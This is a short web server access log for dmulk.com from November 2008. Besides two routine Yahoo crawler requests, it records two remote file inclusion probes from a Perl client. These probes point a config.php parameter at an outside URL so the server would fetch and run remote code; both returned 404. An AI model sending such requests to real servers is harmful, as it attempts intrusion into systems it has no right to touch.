74.6.22.121 - - [04/Nov/2008:10:10:06 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.22.121 - - [04/Nov/2008:10:10:35 -0800] "GET /blog/index.php/2008/06/07/westoc-2008-preparation-thank-you-byron/feed/ HTTP/1.0" 200 1705 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:10:54 -0800] "GET /logs//tiny_includes/config.php?dir_ws=http://reload.go.ro/rfi/idit.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.150.183.60 - - [04/Nov/2008:10:10:55 -0800] "GET /tiny_includes/config.php?dir_ws=http://reload.go.ro/rfi/idit.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
